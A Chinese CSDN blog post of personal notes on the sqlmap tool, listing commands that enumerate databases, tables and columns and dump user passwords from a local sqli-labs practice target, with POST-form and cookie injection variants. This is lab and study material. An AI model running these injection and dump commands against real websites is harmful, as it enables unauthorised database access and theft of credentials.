网络安全渗透之sqlmap

已于 2023-05-25 14:26:19 修改
阅读量106 收藏
点赞数
分类专栏: 常用工具 网安渗透技术 文章标签: web安全 网络安全
于 2023-05-21 22:54:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43095240/article/details/129499043
版权

1、常用指令

sqlmap -u “http://127.0.0.1/sqli/Less-1/?id=1” --dbs
sqlmap -u “http://127.0.0.1/sqli/Less-1/?id=1” --current-db
sqlmap -u “http://127.0.0.1/sqli/Less-1/?id=1” -D security --tables
sqlmap -u “http://127.0.0.1/sqli/Less-1/?id=1” -D security -T users --columns
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” -D security -T users -C password --dump
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --dump-all

sqlmap -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security --dump-all

输出指定数据库指定表中的全部数据:

sqlmap -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security -T user --dump-all

2、其他

【1】post注入

  • sqlmap -r “1.txt” -p user --dbs
  • sqlmap -u “http://127.0.0.1/sqli-labs/Less-1” --forms
  • sqlmap -u “http://127.0.0.1/sqli-labs/Less-1” --data “user=1&passwd=1”

【2】cookie注入

  • sqlmap -r “1.txt” --cookie “uname=admin” --level 2
  • sqlmap -u “http://127.0.0.1/sql/Less-20/” --cookie=“uname=admin” --level 2
  • sqlmap -r “1.txt” -p cookie

3、细节

【1】指令选项大小写问题
例如–dbs不能写成–DBS

hlsilent
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap-py原版.zip
03-30
sqlmap开源的渗透测试工具,可以自动检测和利用sql注入缺陷,基于python编写。测试环境:vmare搭建靶场pentesterlab 使用python + sqlmap进行测试。sql注入原理:当客户端提交的数据未作处理或转义直接带入数据库,就...
SQLMAP渗透笔记之Mysql Dos攻击
Birdman-one的博客
12-26 1009
---------------------------------------------------------------------------------------------                 SQLMAP渗透笔记之Mysql Dos攻击 ---------------------------------------------------------
使用sqlmap进行SQL注入攻击
不忘初心,护天下安全!
11-23 8915
SQL注入攻击的特点 ① Web应用程序没有对用户输入进行合法性验证而产生SQL注入漏洞( “空格”的存在和使用); ② 攻击者通过构造特殊的SQL语句,将指令插入系统原始的SQL查询语句中并执行它; ③ 获取数据库的敏感信息,甚至获取主机的控制权。     SQL注入攻击具有广泛性。 原理 SQL注入的原理 ① 地址http://127.0.0.1/inject.asp?dbtype=sq...
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 15万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
网络安全 | 渗透工具】SQLmap精讲(全网最详细图文教程)
等风来
01-06 6984
SQLmap是一款开源的SQL注入工具,用于检测和利用Web应用程序的SQL注入漏洞。SQLmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等,并支持各种不同的操作系统和平台。留言板项目SQLmap渗透实例 | CSDN@秋说本文以目标账号与其它进行讲解。
39.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。写文章-CSDN
Eastmount网络安全博客之各种工具及代码资源(IDA、BP、Nmap、Wireshark等)
10-11
[网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例 [网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登录加密入门...[网络安全自学篇] 十六.Python攻防之弱口令、自定义字典生成及网站暴库防护
渗透工具使用教程.zip
01-14
在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署...
网络安全培训方案.docx
07-09
网络安全培训方案 网络安全培训方案全文共8页,当前为第1页。网络安全培训方案全文共8页,当前为第1页。培训方案 网络安全培训方案全文共8页,当前为第1页。 网络安全培训方案全文共8页,当前为第1页。 对学生知识的...
网络安全思考题
weixin_62304542的博客
04-27 1170
网络安全渗透思考题
网络安全的重要性及人才需求
yj520400的博客
04-29 789
能从事政府部分的安全规范和安全管理,包括法律的制定,也能从事安全企业的安全产品的研发,还能从事一般企业的安全管理和安全防护,国与国之间的空间安全的协调。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。如果你把每周要学的内容精细化到这种程度,你还会担心学不会,入不了门吗,其实说到底就是学了两个月,但都是东学一下,西学一下,什么内容都是浅尝辄止,没有深入进去,所以才会有学了2个月,入不了门这种感受。因为漏洞是依赖于产品的,产品更新换代,漏洞也会更新换代。
网络安全实训Day16
Yisitelz的博客
04-26 1946
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
面对网络安全,做好风险评估对企业会带来哪些帮助
dexunyun的博客
04-29 686
风险评估对企业有多方面的益处,通过风险评估,可以帮助企业系统分析资产所面临的威胁,及其存在的脆弱性,评估安全事件一旦发生可能造成的危害程度,并提出有针对性的抵御威胁的防护对策、整改措施。这也是企业进行风险评估的主要原因。从信息安全的角度来看,风险评估是对信息资产(即某事件或事物所具有的信息集)所面临的威胁、存在的弱点、造成的影响,以及三者综合作用所带来风险的可能性的评估。风险对策会付出一定代价,需将不同风险对策的适用性与不同风险的后果结合考虑,使不同风险选择适宜的风险对策,形成高效的风险对策组合。
网络安全WebShell截获
为了生活,不得不努力奋斗!
04-24 960
【代码】网络安全WebShell截获。
网络安全(黑客)—2024自学
dexi113的博客
04-25 2415
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!
Web安全研究(七)
最新发布
至臻求学,胸怀云月
05-02 1356
作者从14个主要商业网站收集到第一个十亿级的测量研究,且进一步将指纹分类为良性和攻击指纹,使用的是F5公司基于学习的反馈驱动的欺诈和bot检测系统;得到3个主要结论:(i)攻击指纹在许多指标上与良性指纹显著不同,例如熵、唯一率和演变速度;(ii)攻击者正在采用各种工具和策略生成攻击指纹;(iii)攻击指纹在不同攻击类型之间变化,例如从内容抓取到欺诈交易。
网络安全(黑客技术)—2024自学手册
y473158Yansu的博客
04-27 1298
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
指纹浏览器:网络安全与隐私的新工具
qq_29268247的博客
04-29 617
通过隐藏、随机化和伪装浏览器特征,它可以降低用户被追踪和识别的风险。浏览器指纹是一种通过收集用户浏览器和设备的各种参数来识别用户的技术,包括浏览器类型、操作系统、插件、字体、屏幕分辨率、硬件配置等。2. 隐藏特征:指纹浏览器可能会隐藏一些敏感信息,如用户的浏览器插件列表、字体等,从而减少可识别的特征。指纹浏览器的目的是通过随机化或隐藏用户的浏览器特征,降低被识别和追踪的可能性,增强用户的隐私和匿名性。3. 伪装:指纹浏览器可能会伪装成某种常见的浏览器,以混淆指纹信息,使其看起来与其他用户的浏览器类似。
kali sqlmap
05-05
Kali Linux 是一个基于 Debian 的 Linux 发行版,旨在为网络安全渗透测试人员提供一个完整的平台。而 SQLMap 则是一个自动化 SQL 注入工具,可用于发现和利用 SQL 注入漏洞。在 Kali Linux 中,SQLMap 通常预装在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hlsilent

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值